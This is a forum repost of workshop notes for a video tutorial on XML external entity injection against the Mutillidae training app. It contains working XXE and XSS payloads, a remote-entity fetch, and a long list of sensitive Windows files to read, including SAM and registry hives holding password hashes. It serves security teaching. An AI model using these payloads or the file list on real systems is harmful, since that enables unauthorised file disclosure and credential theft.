Jump to content
Nytro

Video Tutorial: Introduction to XML External Entity Injection

By Nytro, in Tutoriale video

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

[h=1]Video Tutorial: Introduction to XML External Entity Injection[/h]Posted by webpwnized in Information Security on Sep 12, 2013 9:01:16 AM Title: Video Tutorial: Introduction to XML External Entity Injection

Author: webpwnized

From: ISSA KY Sept 2013 Workshop (Louisville, KY)

Twitter: @webpwnized

This video introduces XML injection to achieve XML external entity injection (XXE) and XML based cross site scripting (XSS). Please find notes used/mentioned in video posted below the video.

1. What is XML injection

2. What is an "entity"

3. What is entity injection

4. Cross site scripting with entity injection

5. Determining local execution path

6. Determining privileges of "user"

7. Directory traversal

8. file:/// protocol

9. Local File Inclusion with entity injection

Firefox --> Burp-Suite --> Apache2 --> PHP App Server --> PHP Code --> XML Parser --> PHP --> Apache2 --> Burp-Suite --> Firefox

Basics

<?xml version="1.0"?><change-log><text>Hello World</text></change-log>

<?xml version="1.0"?><change-log><text>"Hello World"</text></change-log>

<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY myEntity "World"> ]><change-log><text>Hello &myEntity;</text></change-log>

<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY myEntity "World"><!ENTITY myQuote """> ]><change-log><text>&myQuote;Hello &myEntity;&myQuote;</text></change-log>

Information Disclosure

C:\xampp\htdocs\mutillidae\xml-validator.php

file:///C:/xampp/htdocs/mutillidae/xml-validator.php

Try to cause various errors in order to coax information from XML parser

Try to load files that dont exist

Put whitespace before the XML

Send malformed XML

Determine operating system type and the path at which interpretation is taking place

Cross site scripting

<?xml version="1.0"?><change-log><text><script>alert("FAIL")</script></text></change- log>

<?xml version="1.0"?><change-log><text><script>alert("Hello World")</script></text></change-log>

Local File Inclusion

Try to acquire application configuration files and/or source code files

Try to acquire operating system files

<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY systemEntity SYSTEM "robots.txt"> ]><change-log><text>&systemEntity;</text></change-log>

Remote File Inclusion

<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY systemEntity SYSTEM "http://192.168.56.102/index.html"> ]><change-log><text>&systemEntity;</text></change-log>

Windows XP SP3

%WINDIR% = C:\WINDOWS

%SYSTEMDRIVE% = C:

%SYSTEMROOT% = C:\WINDOWS

Credit: Rob "Mubix" Fuller

file:///C:\WINDOWS\System32\drivers\etc\hosts

%WINDIR%\System32\drivers\etc\hosts

Blind Files

%SYSTEMDRIVE%\boot.ini

A file that can be counted on to be on virtually every windows host. Helps with confirmation that a read is happening.

%WINDIR%\win.ini

This is another file to look for if boot.ini isn’t there or coming back, which is sometimes the case.

%SYSTEMROOT%\repair\SAM

%SYSTEMROOT%\System32\config\RegBack\SAM

It stores users' passwords in a hashed format (in LM hash and NTLM hash). The SAM file in \repair is locked, but can be retired using forensic or Volume Shadow copy methods

%SYSTEMROOT%\repair\system

%SYSTEMROOT%\System32\config\RegBack\system

Files To Pull (if possible)

%SYSTEMDRIVE%\pagefile.sys

Large file, but contains spill over from RAM, usually lots of good information can be pulled, but should be a last resort due to size

%WINDIR%\debug\NetSetup.log

%WINDIR%\repair\sam

%WINDIR%\repair\system

%WINDIR%\repair\software

%WINDIR%\repair\security

%WINDIR%\iis6.log (5, 6 or 7)

%WINDIR%\system32\logfiles\httperr\httperr1.log

IIS 6 error log

%SystemDrive%\inetpub\logs\LogFiles

IIS 7’s logs location

%WINDIR%\system32\logfiles\w3svc1\exYYMMDD.log (year month day)

%WINDIR%\system32\config\AppEvent.Evt

%WINDIR%\system32\config\SecEvent.Evt

%WINDIR%\system32\config\default.sav

%WINDIR%\system32\config\security.sav

%WINDIR%\system32\config\software.sav

%WINDIR%\system32\config\system.sav

%WINDIR%\system32\CCM\logs\*.log

%USERPROFILE%\ntuser.dat

%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index. dat

%WINDIR%\System32\drivers\etc\hosts

Sursa: https://community.rapid7.com/community/infosec/blog/2013/09/12/video-tutorial-introduction-to-xml-external-entity-injection

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...